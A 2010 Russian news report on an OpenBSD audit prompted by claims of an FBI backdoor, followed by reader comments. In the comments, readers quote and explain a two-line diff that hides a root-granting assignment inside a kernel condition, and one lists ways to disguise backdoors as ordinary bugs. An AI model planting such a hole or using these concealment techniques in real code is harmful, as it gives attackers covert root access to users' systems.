OpenBSD проводит аудит: бэкдоров нет, но баги есть

image

Теги: OpenBSD, уязвимость, бэкдор, ФБР

Лидер проекта разработки операционной системы OpenBSD Тео Де Раадт накануне в листе рассылки для пользователей и разработчиков ОС, сообщил, что инженерная группа OpenBSD проводит проверку кода на предмет наличия бэкдоров, позволяющих удаленно получать доступ к данным, находящимся под управлением ОС.

Лидер проекта разработки операционной системы OpenBSD Тео Де Раадт накануне в листе рассылки для пользователей и разработчиков ОС, сообщил, что инженерная группа OpenBSD проводит проверку кода на предмет наличия бэкдоров, позволяющих удаленно получать доступ к данным, находящимся под управлением ОС.

Напомним, что на прошлой неделе сообщество разработчиков OpenBSD всколыхнул некий Грегори Перри, бывший технический директор компании NetSec, утверждавший, что в 2000 году его компания по заказу ФБР США разрабатывала код для бэкдора, предполагаемого к размещению в OpenBSD. Сам Перри сообщил, что в 2000 году его компания была вынуждена подписать 10-летнее соглашение о неразглашении, теперь же его срок истек и Перри придал огласке указанные сведения.

Де Раадт сообщил, что реакция на данное сообщение в сообществе разработчиков была неоднозначной, так как одни говорили, что разместить закладку в открытой операционной системе невозможно ввиду общедоступности ее исходников всем интересующимся и за 10 лет "странный" код уже мог бы быть неоднократно найден. Другие говорили, что код современных операционных систем - это сотни тысяч строк кода и разместить там бэкдор незаметно в принципе возможно, особенно если хорошо постараться.

Так или иначе, но Тео Де Раадт говорит, что все актуальные на сегодня версии OpenBSD сейчас проходят процедуру аудита со стороны создателей системы и ничего подозрительного и напоминающего потайной ход в ОС пока не найдено. Зато были найдены некоторые уязвимости о которых прежде не сообщалось, но теперь они будут исправлены. "Характер этих уязвимостей говорит о том, что они появились в системе непреднамеренно и они не могут претендовать на роль бэкдора", - сказал Де Раадт.


или введите имя

CAPTCHA
Страницы: 1  2  
Дед Щукарь
24-12-2010 10:38:50
разместить закладку в открытой операционной системе невозможно ввиду общедоступности ее исходников всем интересующимся и за 10 лет...С каких пор бэкдоры стали размещать в исходниках?
0 |
24-12-2010 10:45:38
Дедок, поясни, для внучков свою мысль.
0 |
Дед Щукарь
24-12-2010 11:26:15
Ну вот вы берете диск и устанавливаете эту OpenBSD на компьютер, так? Значит берете не исходники, а бинарники. И проверять нужно не исходники.
0 |
24-12-2010 11:34:13
так?Не так. Кому действительно важна и безопасность и стабильность, тот пересобирает из исходников. Кроме того, бинарники, если взяты не с помойки, имеют контрольные суммы, гарантирующие, что они собраны из эталонных исходников. А то, что ты описал, это такое в винде происходит.
0 |
Дед Щукарь
24-12-2010 11:55:39
компания по заказу ФБР США разрабатывала код для бэкдораНу не станут же они специально размещать бэкдор прямо на виду, и при этом компания была вынуждена подписать 10-летнее соглашение о неразглашенииА у винды свой хозяин дядя Билл, который не позволит так просто участие другим компаниям. Так что винда безопаснее ибо коммерческий продукт!
0 |
RU_LIDS
24-12-2010 12:20:19
А у винды свой хозяин дядя Билл, который не позволит так просто участие другим компаниям. Так что винда безопаснее ибо коммерческий продукт!Ну это вы дали, дедушка, козе под дых! Во первых, Билли упадет и отожмется. Во вторых, право собственности на ПО не имеет отношения к его безопасности. Что подтверждается постоянным обнаружением дырок в этом ПО. Говорили бы тогда уж об открытости или закрытости исходников.
0 |
Гость
24-12-2010 12:35:19
А у винды свой хозяин дядя Билл, который не позволит так просто участие другим компаниям. Так что винда безопаснее ибо коммерческий продукт! Сомневаюсь, что дядя Билли или дядя Стив "не позволят просто так участие" ФБР или АНБ. А дальше Ваша логика в стиле "В огороде бузина, а в Киеве дядька"
0 |
24-12-2010 16:39:43
дядя Билл, который не позволитПогугли про бэкдор в винде основанный на специально подобранных АНБ коэффициентах "эллиптических кривых". Это новость вроде даже на секлабе была. И про искусственное ослабление шифрования в экспортных продуктах из пиндосии погугли. Попробовал бы билли не прогнуться под свое правительство, живо бы присел на зону за изнасилование шведских непарнокопытных феминисток. Что это за эталонный исходник? smile:D про какую контрольную сумму ты говоришь?Тот, который размещен у автора софта, в данном случае OpenBSD. Для него есть и контрольная сумма, это стандартная процедура для открытых исходников. И компилятор там же раздают, и рекомендации по его опциям, что бы получить точную копию бинарников, если так уж сильно захочется. Но если боишься, что в компиляторе бэкдор , то можешь сторонним пользоваться.
0 |
07036
24-12-2010 20:18:06
Тот, который размещен у автора софта, в данном случае OpenBSD. Для него есть и контрольная сумма, это стандартная процедура для открытых исходников.контрольная сумма нужна скорее когда есть перебои с интернетом. иль вам удаётся качать что-то одно, а приходит другое? ЛОЛ
0 |
27-12-2010 14:44:19
притворяетесь, или действительно не ведаете, что несете?
0 |
60823
24-12-2010 20:21:59
Тот, который размещен у автора софта, в данном случае OpenBSDони и есть идентичны. Что у "автора", что на сайте, что у меня, если скачаю. Если бы это было не так, то система вообще не компилилась бы.
0 |
39886
24-12-2010 13:12:28
Не так. Кому действительно важна и безопасность и стабильность, тот пересобирает из исходников. Кроме того, бинарники, если взяты не с помойки, имеют контрольные суммы, гарантирующие, что они собраны из эталонных исходников.лол, что? Мой бинарник собранный на компе не будет отличаться от бинарника собранного у них (ну кроме некоторой оптимизации компилятора). Что это за эталонный исходник? про какую контрольную сумму ты говоришь? Если бинарник может быть с дырой, и по этому же бинарнику и создана контрольная сумма. в общем, вижу тут труъ программисты собрались
0 |
фетиш-мастер [Малиновые штаны]
24-12-2010 18:07:34
Кроме того, бинарники, если взяты не с помойки, имеют контрольные суммы, гарантирующие, что они собраны из эталонных исходников.сборка-сборке рознь контрольные суммы нужны исключительно для того, чтобы сверить целостность или идентичность файла
0 |
merd
24-12-2010 11:51:19
Вы говорите так, как Вам кажется, правда? Так я Вас разочарую - Вам кажется неправильно. Мой Вам совет - не судите о том, о чем Вы не имеете ни малейшего представления.
0 |
13247
24-12-2010 13:05:25
Ну вот вы берете диск и устанавливаете эту OpenBSD на компьютер, так? Значит берете не исходники, а бинарники. И проверять нужно не исходники. Дед Щукарь, а бинарники по-твоему каким образом получились?
0 |
24-12-2010 13:17:06
Известно каким. Святым духом надуло. Через астрал.
0 |
dimko
26-12-2010 14:24:35
Бэк дор - это концепт уязвимости. Он не может быть в принципе толко в бинарнике или в исходнике. Исключение, только если прогу дисасемблировали. Но дизассемблированный код, тоже в принципе исходный... Хотя есть умельцы которые могут и бинары читать, но таких надо сразу расстреливать, они потенциалная опастность для всего общества.
0 |
69189
24-12-2010 10:41:59
Поис неизвестного "заднего прохода" все равно что задание для Иванушки Дурачка :- "Иди туда, незнаю куда..., Ищи то, незнаю что". Искать можно только зная примененный алгоритм, без этого знания, везде будут встречаться только "Баги" да "Уязвимости".
0 |
todo
24-12-2010 11:21:05
Ну лично Вас-то как раз вряд ли попросят искать этот самый бэкдор. По причине отсутствия лично у Вас подобных "знаний". Те, кто в состоянии это найти - ищут. И знают где искать, уверяю Вас.
0 |
dimko
26-12-2010 14:27:20
А также есть бэкдоры, которые себя скрывают, а которые и нет...
0 |
55031
24-12-2010 14:45:07
"Характер этих уязвимостей говорит о том, что они появились в системе непреднамеренно и они не могут претендовать на роль бэкдора" +       if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) +                       retval = -EINVAL; Тоже смахивает на непреднамеренную опечатку....
0 |
AcDc
24-12-2010 15:11:51
Вот вот. Из таких опечаток, разбросаных в разных участках кода и состоит бэкдор.
0 |
36348
25-12-2010 01:40:55
Не, это явно не тот случай. Здесь C по белому написано "я бекдор - убейте меня!". Собственно убиение этого кода и было реакцией первого же человека заметившего эти строчки. Поскольку в связи с известными недавними событиями эти строчки всплывают часто - я решил проверить насколько такое может быть не замеченным. Показал этот фрагмент в контексте функции в которой была попытка её добавить и попросил друга (виндузятника, с линухами ничего общего не имеющего) - прокоменнтировать что делает этот код. Реакция через 10 секунд - да тут ошибка!!! И показывает на символ =. У сишников с опытом глаз намётан на такое. Это нельзя пропустить. Далее - интереснее - говорю ему к сведению, что uid - это user id а 0 это идентификатор суперпользователя... Реакция молниеносная - "Так это не ошибка, это похоже пренамеренно оставленная лазейка". Посему, если этот пример и использовать - то исключительно в целях демонстрации _неудачной_ попытки сокрытия бекдора под баг. Существуют куда более удачные схемы сокрытития где действительно все обставляется как невинная ошибка, вроде переполнения буфера ровно на 1 символ (ошибка расчёта длины строки), не совсем правильного применения крипто-алгоритма, ошибки срабатывающие как race condition возможным исключительно на multicore, или несколько "багов", каждый из которых с виду некритичен и не опасен, но при одновременном их проявлении в неочевидной комбинации вызывают нужный эффект, и т.п.
0 |
44287
27-12-2010 11:28:56
Покажите это в контексте не одной функции, а в контексте 1000000 строк кода...
0 |
97197
27-12-2010 15:35:48
Данный комментарий - неадекватен, так как изменения и их ревью выполнется инкрементально. К тому же вышеприведенный пример вносился добавлением лишь этих двух строк. Не заметить это было ну просто невозможно.
0 |
Duot
25-12-2010 00:47:59
Я сильно извиняюсь, но 55031 не мог бы пояснить для общего образования.
0 |
Гость
25-12-2010 01:02:51
Вместо current->uid == 0 (проверка uid 0 то есть на рута) идет присвоение current->uid значения 0 - то есть обеспечивает рутовый доступ.
0 |
41812
25-12-2010 01:48:47
Да, так и есть, стоит добавить что вследствие ньюансов работы оператора && - активация присвоения выполняется только при определенной комбинации влагов в параметрах - причем редко используемой (или вообще не используемой никем) - это является т.н. "ключем" активации бекдора. Однако при всем при этом это неудачный пример качественного сокрытия бекдора - пояснения выше по треду.
0 |
44287
27-12-2010 11:31:32
Однако при всем при этом это неудачный пример качественного сокрытия бекдора - пояснения выше по треду. Удачные примеры... таки их ни кто еще просто не обнаружил... на то они и удачные... что найти не могут...
0 |
78487
27-12-2010 15:32:12
Именно об этом я и говорю!
0 |
73348
25-12-2010 01:44:33
У любого
0 |
Хвост
25-12-2010 13:41:06
Очень радует, что находятся некоторые уязвимости , если бы все было чисто - было бы жутко обидно за двойную работу.
0 |
Страницы: 1  2